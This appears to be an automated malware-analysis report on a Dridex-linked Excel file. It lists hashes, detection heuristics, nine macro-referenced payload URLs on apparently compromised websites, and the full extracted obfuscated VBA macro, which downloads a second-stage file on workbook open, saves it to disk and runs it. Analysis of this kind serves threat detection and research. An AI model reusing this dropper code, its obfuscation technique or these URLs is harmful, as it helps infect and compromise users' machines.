Dridex — Office (OOXML) malware analysis

Static analysis result for SHA-256 aef7619253a8906e…

MALICIOUS

Office (OOXML)

70.6 KB Created: 2021-04-28 14:20:21 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2021-05-22
MD5: 24fd1873f911783ca6954c8504b95112 SHA-1: 06c356a380b046cf9f97c329789abf887da811a6 SHA-256: aef7619253a8906e296c8122912bae7b828259bdd65ec2f3be3745194aa85d86
238 Risk Score

Malware Insights

Dridex · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1566.001 Spearphishing Attachment

The sample is an Excel document containing a Workbook_Open VBA macro. This macro is designed to download and execute a second-stage payload from one of the provided URLs. The ClamAV detection name 'Xls.Downloader.DridexDarkGreen1020210-9905041-0' strongly suggests the Dridex family. The critical heuristic 'OLE_VBA_HTTP_DROP_EXEC' confirms the download and execution behavior.

Heuristics 8

  • ClamAV: Xls.Downloader.DridexDarkGreen1020210-9905041-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.DridexDarkGreen1020210-9905041-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    CUCKOLDOM_GURNS.Write .responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set HYPOXIAUNROOTED = CreateObject(MERCERY_HATCHEL_SINGLE)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    TACNODESLOBOTOMIZESTEREOBATE = Environ(escrocsreportageformularisemut.PAWNAGES_LAZULIS_ARCTOPHILIES_(airbus_palpitant))
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://hdsecashpoint.com/hds/plugins/datatables/extensions/AutoFill/OG1XlESJf0.php Referenced by macro
    • https://msmsecurityguards.com/static.wixstatic.com/media/cfa8e9_b80d5557ddd14fcfb79b6f7375e1e107_mv2.png/v1/fill/YWrZSo7OXzDJGy.phpReferenced by macro
    • https://lcd.cl/laravel/vendor/symfony/debug/Exception/FcuTrOHHiC.phpReferenced by macro
    • https://ultimasvagascompleto.com.br/wp-content/plugins/pretty-link/app/controllers/9xdo57R8588x0BE.phpReferenced by macro
    • https://apptownstore.com/public/adminpanal/bower_components/bootstrap-colorpicker/dist/FFHzimpdK4NcGa.phpReferenced by macro
    • https://www.bluhome.com.br/media/vendor/validation/test/additional/7ngcFscA4tK.phpReferenced by macro
    • https://alttitude-finance.com/wp-content/plugins/js_composer/vendor/mmihey/5qWkwHxc.phpReferenced by macro
    • https://couponoffer.app/vendor/symfony/var-dumper/Dumper/ContextProvider/80gsD0S1lwB.phpReferenced by macro
    • https://wthon.view.edu.in/fonts/flaticon/font/LHPldvNhLaLZT1W.phpReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 10607 bytes
SHA-256: 7e73a76d60c12e555e76f9fa62f018e4dd17ea1282d3d6894c78d2c0e9e1b99f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
IsDate (whingeshardtoptwankiesmonocrys.PLEIOMERIES_FELCHED(CHINOOK_VILLAINIZES_REINFORCE))
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "escrocsreportageformularisemut"
Function TURBINACIOUSLINEARIZINGFENESTR(LUBBERLINESSDIGLADIATORSUNSOAK)
PIPEWORTSPROJECTINGSJAGGS = Mid("!h^T#b.0/g:7EW", CLng((Not xlParamTypeWChar)), CLng((551 + -549)))
BESCRIBBLED_PALLORS_CHANNELLED = Mid("Xz-rLzK9s,3UOMSXMLRe5tv0auG+!", CLng((920 - 906)), CLng((xlCellValue Or xlPaperLedger)))
dwining_nihil_drainer = Worksheets("buoying_inte").Range("HI217")
disciplinarium_rufflike = Worksheets("QUERYHOMOSEX").Range("BZ219")
TURRICULATED_MITOCHONDRION_TRO = Worksheets("buoying_inte").Range("IG183")
TURBINACIOUSLINEARIZINGFENESTR = Join(Array(BESCRIBBLED_PALLORS_CHANNELLED & TURRICULATED_MITOCHONDRION_TRO & dwining_nihil_drainer & disciplinarium_rufflike & PIPEWORTSPROJECTINGSJAGGS))
End Function
Function PAWNAGES_LAZULIS_ARCTOPHILIES_(bunfights_mortarmen)
VOUDOUSDITTINGANOWALBUMENISED = Worksheets("halleluiah_g").Range("DB103")
UNWINKINGUNFOLDSLANTUNBUTTONED = Mid("2;|q#wObkw+P0vtaoFGwD@|v>1\", CLng((6.84931506849315E-02 * 219)), CLng((xlMixedLabels And xlErrorHandler)))
PAWNAGES_LAZULIS_ARCTOPHILIES_ = Join(Array(VOUDOUSDITTINGANOWALBUMENISED & Mid(":0iwas2_>o^ma.p6c4*;W^pG7q", CLng((124 - xlPyramidBarClustered)), CLng((Not xlParamTypeBinary))) & Worksheets("buoying_inte").Range("BX102") & UNWINKINGUNFOLDSLANTUNBUTTONED))
End Function

Attribute VB_Name = "striplingsoutbark"
Function CYPROTERONE_UNLOOSED(RUGGINGSBAFFLEDCENTRALIZERECHE)
ANCIENTRIES_VOZHDS = Replace("gR2h+gR2h+gR2h+gR2h+GgR2h+", "gR2h+", "")
PRECISIONISTS_BALLYHOOS_HEDGER = Worksheets("halleluiah_g").Range("FI104")
dinitrobenzenesamphiblasticlan = Replace("YL,LOYL,LOYL,LOYL,LO", "YL,LO", "")
DAKERED_LEEZE_CHELONES_DOGFOUG = Mid("hYg|k^*6be7(RT;TUgy", CLng((xlInsertEntireRows Or xlInsideHorizontal)), CLng((xlSortValues Or xlKatakanaHalf)))
CYPROTERONE_UNLOOSED = ANCIENTRIES_VOZHDS & PRECISIONISTS_BALLYHOOS_HEDGER & DAKERED_LEEZE_CHELONES_DOGFOUG & dinitrobenzenesamphiblasticlan
End Function
Function TOADLESSUNAPPREHENSIVEPLEADERS(timecardsankylosaurusesscoured)
wettishsironizing = Replace("PrLDQlVPrLDQlVPrLDQlVPrLDQlVV25", "PrLDQlV", "")
compurgations_cyanosed = Worksheets("halleluiah_g").Range("BT139")
TOADLESSUNAPPREHENSIVEPLEADERS = Join(Array(Worksheets("QUERYHOMOSEX").Range("BU175") & compurgations_cyanosed & Mid("TparF2PL D:#,Q+(N(uQT2", CLng((2.72277227722772E-02 * 404)), CLng((-721 + 722))) & Mid(":4>+I-g5TK)$Z.Ib27)wKn", CLng((-3.59712230215827E-02 * -417)), CLng((-2.31481481481481E-03 * -432))) & wettishsironizing & Replace("O=#NWsO=#NWs6O=#NWsO=#NWsO=#NWs", "O=#NWs", "") & Mid("1-mb|e5skf,.1^ALxq%q2vsgv*pf", CLng((618 - 604)), CLng((xlKatakanaHalf And xlNoRestrictions)))))
End Function

Attribute VB_Name = "apparatchiksplasterworksstabil"
Function TRAINBEARERSQUATTY(toolpushersrandsblaud)
slothfulnesses_resistibilities = Worksheets("QUERYHOMOSEX").Range("DK132")
TRAINBEARERSQUATTY = Join(Array(Worksheets("TSAREVICH_PS").Range("EV116") & Replace("IRh )VNIRh )VNIRh )VNIRh )VNIRh )VNB.S", "IRh )VN", "") & Worksheets("halleluiah_g").Range("BU66") & Mid("kiA7bream.L;K@^q16", CLng((Not xlTenMillions)), CLng((-9.47867298578199E-03 * -422))) & slothfulnesses_resistibilities))
End Function
Function MUDLARKING_VERNACULARISE_DISPR(sitophobias_gynodioecious)
UNSANCTIONEDZARATITEMACABRE = Worksheets("detortions_i").Range("IT232")
vernality_missal = Replace("+k#xO=r+k#xO=+k#xO=+k#xO=", "+k#xO=", "")
romanticized_chubascos_deinoth = Worksheets("detortions_i").Range("CX173")
swirlsensiblenessesdowdierrhab = Replace("J-@Y*;(J-@Y*;(J-@Y*;(J-@Y*;(ip", "J-@Y*;(", "")
piperinesouzelsmongrelisingdwa = Replace("02>FC02>FC02>FCe", "02>FC", "")
DEIFORMIDIOMORPHICALLYGYROVAGU = Replace("uYJT%xvuYJT%xvuYJT%xvWscuYJT%xvuYJT%xv", "uYJT%xv", "")
MUDLARKING_VERNACULARISE_DISPR = DEIFORMIDIOMORPHICALLYGYROVAGU & vernality_missal & swirlsensiblenessesdowdierrhab & UNSANCTIONEDZARATITEMACABRE & piperinesouzelsmongrelisingdwa & romanticized_chubascos_deinoth
End Function
Function martialisms_geothermally_troph(BERYLLIAS_OUVRIERES)
DESMODIUMSETCHCONNOTATIONALENF = Replace("rundUv#6YgUv#6YgUv#6Yg", "Uv#6Yg", "")
martialisms_geothermally_troph = Join(Array(DESMODIUMSETCHCONNOTATIONALENF & Mid("FQx^8kll32.ejS0S>t", CLng((xlDialogPivotFieldUngroup + -427)), CLng((xlDisabled Xor xlCSV))) & Mid(" m9Q77seYhcxeEiurJ", CLng((-0.051948051948052 * -231)), CLng((-2.53485424588086E-03 * -789)))))
End Function
Function pollenatecircumstantialityviol(LEPROSARIA_ENWREATHED_IMPARADI)
dilliesmwah = Worksheets("TSAREVICH_PS").Range("GS144")
PLEONASTICALLY_MADOQUAS = Worksheets("QUERYHOMOSEX").Range("EN165")
TORTOISESHELLS_HONDLING_WIKIS_ = Worksheets("buoying_inte").Range("CM70")
pollenatecircumstantialityviol = Join(Array(dilliesmwah & PLEONASTICALLY_MADOQUAS & TORTOISESHELLS_HONDLING_WIKIS_))
End Function
Function TUTIORISMTUTELAGESKYANITE(qualityduffelclairaudientslyse)
zinckifications_midwinters_lib = Mid("(%yx\tsAGj\2311l$eYN.UJG6y", CLng((-319 + xlDialogVbaProcedureDefinition)), CLng((Not xlParamTypeTinyInt)))
RADIALISESGANTPUDDLING = Replace(";/4xvRt9..d;/4xvRt;/4xvRt;/4xvRt", ";/4xvRt", "")
SCATTERINGSTOVINGS = Replace(",P*K1f;,P*K1f;,P*K1f;l", ",P*K1f;", "")
TUTIORISMTUTELAGESKYANITE = Join(Array(zinckifications_midwinters_lib & RADIALISESGANTPUDDLING & SCATTERINGSTOVINGS & Worksheets("TSAREVICH_PS").Range("IB107")))
End Function
Function PREPREGSVETOUPFURLINGMICROMANA(jackrolllukewarmlyupraises)
SYCOPHANTRIES_SUBADARS = Worksheets("buoying_inte").Range("EC231")
DIVULGATER_BUDGERS_VINERIES_AB = Mid("!mglb-ne;RYHOM,&GEq@6r|!v;(M", CLng((Not -11)), CLng((Not xlParamTypeTinyInt)))
PREPREGSVETOUPFURLINGMICROMANA = Worksheets("TSAREVICH_PS").Range("GC119") & DIVULGATER_BUDGERS_VINERIES_AB & Replace("dh-1FEdh-1FEdh-1FEO", "dh-1FE", "") & Replace("HYKDPSEXHYKDPHYKDP", "HYKDP", "") & SYCOPHANTRIES_SUBADARS
End Function

Attribute VB_Name = "outorganisedfashiousnessescult"
Function TACNODESLOBOTOMIZESTEREOBATE()
TACNODESLOBOTOMIZESTEREOBATE = Environ(escrocsreportageformularisemut.PAWNAGES_LAZULIS_ARCTOPHILIES_(airbus_palpitant))
End Function

Attribute VB_Name = "POLYCARPICREQUITALSDECONDITION"
Function ARENATIONS_TICKETLESS_PENDENTS()
    ARENATIONS_TICKETLESS_PENDENTS = apparatchiksplasterworksstabil.martialisms_geothermally_troph(sterilisingimmotile) & Chr(CLng((-739 - -771))) & Chr(CLng((xlConstants Or xlWQ1))) & outorganisedfashiousnessescult.TACNODESLOBOTOMIZESTEREOBATE() & apparatchiksplasterworksstabil.TUTIORISMTUTELAGESKYANITE(BELLYACHESBEDAZEBLATANCYLORAZE) & Chr(CLng((Not -35))) & " " & apparatchiksplasterworksstabil.pollenatecircumstantialityviol(UNSOPHISTICATION_HERALDS_ABHOR)
End Function

Attribute VB_Name = "medicined_cooperating"
Function HYPOXIAUNROOTED(MERCERY_HATCHEL_SINGLE)
    Set HYPOXIAUNROOTED = CreateObject(MERCERY_HATCHEL_SINGLE)
End Function

Attribute VB_Name = "whingeshardtoptwankiesmonocrys"
Function PLEIOMERIES_FELCHED(trimetersunpropheticalcodrivel)
Set CUCKOLDOM_GURNS = medicined_cooperating.HYPOXIAUNROOTED(apparatchiksplasterworksstabil.TRAINBEARERSQUATTY(MALIST_ARRESTERS_TANTIVY_SCOWL))
Set rooftrees_despitefully_variedn = medicined_cooperating.HYPOXIAUNROOTED(escrocsreportageformularisemut.TURBINACIOUSLINEARIZINGFENESTR(ARMORIALSIRONCLADSROENTGENOGRA))
Set mishegaasen_sjamboks = medicined_cooperating.HYPOXIAUNROOTED(apparatchiksplasterworksstabil.MUDLARKING_VERNACULARISE_DISPR(BOYO_HEPATOSCOPIES_INDULGES))
For Each SASSOLITESTOMENTUMMENGES In Worksheets(apparatchiksplasterworksstabil.PREPREGSVETOUPFURLINGMICROMANA(OVERSTAYHYSSOPSOPPRESSIVEZAMPO)).Range(striplingsoutbark.TOADLESSUNAPPREHENSIVEPLEADERS(verbalize_countesses_resettle_))
If Len(SASSOLITESTOMENTUMMENGES.Value) > CLng((-228 + 231)) Then
With rooftrees_despitefully_variedn
.Open striplingsoutbark.CYPROTERONE_UNLOOSED(rationalisingreshoweredfigwort), SASSOLITESTOMENTUMMENGES.Value, False
.Send
If .Status = CLng((507 + -307)) Then
CUCKOLDOM_GURNS.Open
HvjI8p = Abs(CLng((1960 + -556)))
CUCKOLDOM_GURNS.Type = CLng((-573 - -574))
jpS0c0_6DRMA = Abs(CLng((3297 Or 2093)))
CUCKOLDOM_GURNS.Write .responseBody
QBrx0S = CLng((0.127238454288407 * 1061)) < CLng((xlDialogFormatOverlay Or xlDialogFormulaReplace))
CUCKOLDOM_GURNS.SaveToFile outorganisedfashiousnessescult.TACNODESLOBOTOMIZESTEREOBATE() & apparatchiksplasterworksstabil.TUTIORISMTUTELAGESKYANITE(BELLYACHESBEDAZEBLATANCYLORAZE), CLng((-3.29489291598023E-03 * -607))
CUCKOLDOM_GURNS.Close
With mishegaasen_sjamboks
.Run POLYCARPICREQUITALSDECONDITION.ARENATIONS_TICKETLESS_PENDENTS
End With
Exit For
End If
End With
End If
UNEXCELLED_BESCORCHES:
Next SASSOLITESTOMENTUMMENGES
End Function
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 54272 bytes
SHA-256: f313e5c50f2cbdc747fa620082db197e0566559b08c3c022d86d5c5f2d1c5a28

Open this report in the interactive analyzer, or submit your own file for analysis.